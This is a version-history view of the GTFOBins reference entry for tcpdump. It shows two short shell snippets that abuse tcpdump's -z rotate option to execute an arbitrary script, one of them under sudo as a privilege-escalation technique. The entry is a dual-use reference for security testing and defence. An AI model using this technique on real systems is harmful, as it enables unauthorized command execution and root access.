GTFOBins.github.io/_gtfobins/tcpdump.md

19 lines
503 B
Markdown
Raw Normal View History

2018-08-17 15:16:09 +00:00
---
2018-09-07 11:01:23 +00:00
description: These require some traffic to be actually captured. Also note that the subprocess is immediately sent to the background.
2018-08-17 15:16:09 +00:00
functions:
2018-10-05 17:55:38 +00:00
command:
2018-08-19 08:31:04 +00:00
- code: |
2018-09-06 22:29:58 +00:00
COMMAND='id'
TF=$(mktemp)
2018-08-19 08:31:04 +00:00
echo "$COMMAND" > $TF
chmod +x $TF
tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
2018-10-05 17:55:38 +00:00
sudo:
2018-08-19 08:31:04 +00:00
- code: |
2018-09-06 22:29:58 +00:00
COMMAND='id'
TF=$(mktemp)
2018-08-19 08:31:04 +00:00
echo "$COMMAND" > $TF
chmod +x $TF
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
2018-08-17 15:16:09 +00:00
---